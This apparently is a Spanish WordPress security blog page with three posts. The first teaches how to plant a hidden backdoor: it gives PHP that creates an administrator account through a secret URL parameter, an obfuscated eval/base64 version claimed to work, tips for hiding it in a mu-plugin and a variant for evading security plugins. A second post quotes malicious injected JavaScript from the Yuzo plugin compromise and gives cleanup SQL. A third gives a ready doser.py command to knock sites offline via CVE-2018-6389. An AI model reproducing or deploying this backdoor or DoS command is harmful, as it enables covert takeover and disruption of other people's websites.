Seguridad archivos

Creando un backdoor en WordPress

Jun 22, 2019 | Exploits, Seguridad, WordPress

Os voy a enseñar a crear una puerta trasera en WordPress, bastante útil en muchos aspectos…

 function wordpressusuarios() {
     if ($_GET['wordpress'] == 'usuario') {
         require('wp-includes/registration.php');
         if (!username_exists('Usuarios')) {
             $user_id = wp_create_user('Usuarios', 'usuario');
             $user = new WP_User($user_id);
             $user->set_role('administrator');
               wp_die(__('WordPress instalado...'));
             die();  
 }
 add_action('wp_head', 'wordpressusuarios');

Este es el código, simplemente nos crea el usuario «Usuarios» . Este usuario se crea al usar esta url https://dominio.com/?wordpress=usuario

Nombre de usuario: Usuarios y la contraseña: usuario

¿Porque en el código he puesto WordPress instalado… y no he puesto de usuario backdoor creado o algo asi? Muy sencillo, se trata de ocultarlo lo máximo posible

Ten en cuenta que el usuario aparece en la lista de los usuarios

Si se dan cuenta y te borran el usuario, simplemente vuelves a entrar a la url con los parámetros mencionados y lo puedes volver a crear (Siempre y cuando no encuentren el código que permite hacer esta acción)

Muy bien, pero… ¿Donde pegamos este código?

Se puede añadir en el functions.php del tema o bien puedes crear un mu-plugin que se llame «WordPress» por ejemplo ¿Porque un mu-plugin y no un plugin? Porque poca gente conoce lo que es un mu-plugin y seguramente les sea mas difícil de localizar

También puedes pasarlo a base64 o modificar el codigo para crear más usuarios y pegarlo en diferentes plugins o archivos php.

¿Como seria? Probado y funcionando

eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));

Otra idea es que el código solo se pueda ejecutar en una pagina especifica, por si acaso algún plugin de seguridad detecta el link. Es decir que solo puedas ejecutarlo por ejemplo desde https://dominio.com/contacto?wordpress=usuario

function wordpressusuarios() {
   if( is_page('contacto')) {
           $1 = true;
     }
   if( !$1 ) {
     if ($_GET['wordpress'] == 'usuario') {
         require('wp-includes/registration.php');
         if (!username_exists('Usuarios')) {
             $user_id = wp_create_user('Usuarios', 'usuario');
             $user = new WP_User($user_id);
             $user->set_role('administrator');
               wp_die(__('WordPress instalado...'));
             die();
         }
     }
 }
}
 add_action('wp_head', 'wordpressusuarios');

No he probado esto último, pero diría que así puede funcionar

Desinfectar web hackeada por el plugin Yuzo related

Abr 10, 2019 | Seguridad, Exploits, WordPress

El plugin Yuzo Related Posts, que está instalado en más de 60,000 sitios web, se eliminó del directorio de plugins de WordPress.org el 30 de marzo de 2019 después de que una vulnerabilidad no parcheada fuera divulgada públicamente e irresponsablemente por un investigador de seguridad ese mismo día. Hoy 10 de abril de 2019 esta vulnerabilidad esta siendo explotada masivamente, seguramente con un script que rastrea los sitios vulnerables y si es vulnerable inyecta un codigo javascript que contiene publicidad

</style><script language=javascript>var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://hellofromhony.org/counter';
document.getElementsByTagName('head')[0].appendChild(elem);</script>

Este es el código desofuscado, pero los atacantes lo están inyectando a través de un eval(String.fromCharCode

¿Como desinfecto mi web?

Lo primero que debes hacer es eliminar el plugin de tu WordPress

Después para remover el código lo que tienes que hacer es insertar este código SQL para eliminar la tabla donde está el javascript ofuscado, que es lo que hace que tu web cargue la publicidad

DELETE
FROM `wp_options` 
WHERE `autoload` = 'yes'
AND `option_name` LIKE 'yuzo_related_post_options'

El creador del plugin ya ha corregido las vulnerabilidades y el equipo de plugins de WordPress ya está revisando la nueva versión.

El creador ha publicado un link con la nueva versión (que podéis descargar aquí)

Lo recomendable es esperar a que el equipo de plugins de WordPress lo revise y mantener el plugin alejado de nuestro WordPress, en las próximas horas o días estará de vuelta en el repositorio

Bonus: Si te gusta la seguridad o quieres probar esta vulnerabilidad, aquí tienes información para hacer una prueba de concepto 🙂

Como dejar un sitio de WordPress inoperativo – CVE-2018-6389

Ago 27, 2018 | Seguridad

Según wordpress.com, la plataforma de WordPress impulsa el 29% de los sitios web de Internet en todo el mundo.

En este artículo explicaré cómo la denegación de servicio puede ser causada fácilmente a casi cualquier sitio web de WordPress en línea, y cómo puede parchear su sitio web de WordPress para evitar que esta vulnerabilidad sea explotada.

Es importante tener en cuenta que explotar esta vulnerabilidad es ilegal, a menos que tenga permiso del propietario del sitio web.

Hay una URL en WordPress que carga un monton de archivos, 181 valores

eutil, común, wp-a11y, sack, quicktag, colorpicker, editor, wp-fullscreen-stu, wp-ajax-response, wp-api-request, wp-pointer, autoguardado, heartbeat, wp-auth-check, wp- listas, prototipo, scriptaculous-root, scriptaculous-builder, scriptaculous-dragdrop, scriptaculous-effects, scriptaculous-slider, scriptaculous-sound, scriptaculous-controls, scriptaculous, cropper, jquery, jquery-core, jquery-migrate, jquery-ui- core, jquery-effects-core, jquery-effects-blind, jquery-effects-bounce, jquery-effects-clip, jquery-effects-drop, jquery-effects-explode, jquery-effects-fade, jquery-effects-fold, jquery-effects-highlight, jquery-effects-puff, jquery-effects-pulsete, jquery-effects-scale, jquery-effects-shake, jquery-effects-size, jquery-effects-slide, jquery-effects-transfer, jquery- ui-accordion, jquery-ui-autocomplete, jquery-ui-button, jquery-ui-datepicker, jquery-ui-dialog, jquery-ui-draggable,jquery-ui-droppable, jquery-ui-menu, jquery-ui-mouse, jquery-ui-position, jquery-ui-progressbar, jquery-ui-resizable, jquery-ui-seleccionable, jquery-ui-selectmenu, jquery- ui-slider, jquery-ui-sortable, jquery-ui-spinner, jquery-ui-tabs, jquery-ui-tooltip, jquery-ui-widget, jquery-form, jquery-color, schedule, jquery-query, jquery- serialize-object, jquery-hotkeys, jquery-table-hotkeys, jquery-touch-punch, sugerir, imagesloaded, masonry, jquery-masonry, thickbox, jcrop, swfobject, moxiejs, plupload, plupload-handlers, wp-plupload, swfupload, swfupload-all, swfupload-handlers, comment-repl, json2, guión bajo, columna vertebral, wp-util, wp-sanitize, wp-backbone, revisiones, imgareaselect, mediaelement, mediaelement-core, mediaelement-migrat, mediaelement-vimeo, wp- mediaelement, wp-codemirror, csslint, jshint, esprima, jsonlint, htmlhint, htmlhint-kses, editor de código, wp-theme-plugin-editor, wp-playlist, zxcvbn-async,password-strength-meter, user-profile, language-chooser, user-suggest, admin-ba, wplink, wpdialogs, word-coun, media-upload, hoverIntent, customize-base, customize-loader, customize-preview, customize- modelos, personalizar-vistas, personalizar-controles, personalizar-seleccionar-actualizar, personalizar-widgets, personalizar-vista previa-widgets, personalizar-menús-nav-menus, personalizar-previsualizar-menús-nav-menus, wp-custom-header, acordeón, shortcode, modelos de medios, wp-embe, vistas de medios, editor de medios, audiovideo de medios, mce-view, wp-api, etiquetas de administrador, comentarios de administrador, xfn, buzón de correos, cuadro de etiquetas, sugerencias de etiquetas, publicación, editor-expandir, enlace, comentario, galería-admin, widgets-admin, widgets multimedia, widget-audio-medios, widget-imagen-multimedia, widget-galería-medios, widget-videos-medios, widgets-texto, personalizado- html-widgets, tema, edición en línea, publicación en línea-impuestos, instalación de plugins, actualizaciones, farbtastic, iris, selector de color wp, tablero de instrumentos, lista-revisión, media-grid, medios, edición de imágenes,set-post-thumbnail, nav-menu, custom-header, custom-background, media-gallery, svg-painter

Si solicitamos todos estos recursos a una página web podemos llegar a saturarla

Hice una prueba y el servidor respondió después de 2.2 segundos, con casi 4MB de datos, lo que hizo que el servidor trabajara muy duro para procesar dicha solicitud.

Así que decidí usar doser.py , una herramienta sencilla , diseñada para repetir constantemente las solicitudes

Para causar DoS, y ¿adivinen qué? ¡funcionó! 🙂

Y la web se cae

Video de ejemplo:

El equipo de WordPress no toma esto como una vulnerabilidad ya que dice que se debe proteger a nivel servidor

¿Como protegemos nuestro servidor / web?

Lo recomendable es contratar un buen servicio de alojamiento

y bloquear / redirigir https://www.myweb.com/wp-admin/load-scripts.php

python doser.py -g 'http://mywpserver.com/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp -fullscreen-stu, wp-ajax-response, wp-api-request, wp-pointer, autoguardado, heartbeat, wp-auth-check, wp-lists, prototipo, scriptaculous-root, scriptaculous-builder, scriptaculous-dragdrop, scriptaculous -effects, scriptaculous-slider, scriptaculous-sound, scriptaculous-controls, scriptaculous, cropper, jquery, jquery-core, jquery-migrate, jquery-ui-core, jquery-effects-core, jquery-effects-blind, jquery-effects -bounce, jquery-effects-clip, jquery-effects-drop, jquery-effects-explosde, jquery-effects-fade, jquery-effects-fold, jquery-effects-highlight, jquery-effects-puff, jquery-effects-pulsete , jquery-effects-scale, jquery-effects-shake, jquery-effects-size, jquery-effects-slide, jquery-effects-transfer, jquery-ui-accordion,jquery-ui-autocomplete, jquery-ui-button, jquery-ui-datepicker, jquery-ui-dialog, jquery-ui-draggable, jquery-ui-droppable, jquery-ui-menu, jquery-ui-mouse, jquery- ui-position, jquery-ui-progressbar, jquery-ui-resizable, jquery-ui-seleccionable, jquery-ui-selectmenu, jquery-ui-slider, jquery-ui-sortable, jquery-ui-spinner, jquery-ui- pestañas, jquery-ui-tooltip, jquery-ui-widget, jquery-form, jquery-color, schedule, jquery-query, jquery-serialize-object, jquery-hotkeys, jquery-table-hotkeys, jquery-touch-punch, sugerir, imagesloaded, mampostería, jquery-masonry, thickbox, jcrop, swfobject, moxiejs, plupload, plupload-handlers, wp-plupload, swfupload, swfupload-all, swfupload-handlers, comment-repl, json2, guión bajo, columna vertebral, wp- util, wp-sanitize, wp-backbone, revisiones, imgareaselect, mediaelement, mediaelement-core, mediaelement-migrat, mediaelement-vimeo, wp-mediaelement, wp-codemirror, csslint, jshint, esprima,jsonlint, htmlhint, htmlhint-kses, editor de código, wp-theme-plugin-editor, wp-playlist, zxcvbn-async, password-strength-meter, user-profile, language-chooser, user-suggest, admin-ba, wplink, wpdialogs, word-coun, media-upload, hoverIntent, customize-base, customize-loader, personalizar-preview, personalizar-modelos, personalizar-views, personalizar-controles, personalizar-select-refresh, personalizar-widgets, personalizar- preview-widgets, customize-nav-menus, customize-preview-nav-menus, wp-custom-header, accordion, shortcode, media-models, wp-embe, media-views, editor de medios, media-audiovideo, mce- view, wp-api, admin-tags, admin-comments, xfn, buzón de correos, tags-box, tags-suggest, post, editor-expandir, link, comment, admin-gallery, admin-widgets, widgets-media, media- audio-widget, media-imagen-widget, media-galería-widget, media-video-widget, widgets de texto, html-widgets personalizados, tema, edición en línea-publicación, impuesto-edición-en-línea, instalación-complemento,actualizaciones, farbtastic, iris, selector de color wp, tablero, revisión de listas, media-grid, medios, edición de imágenes, set-post-thumbnail, menú de navegación, encabezado personalizado, fondo personalizado, galería de medios, svg-pintor & ver = 4.9 '-t 9999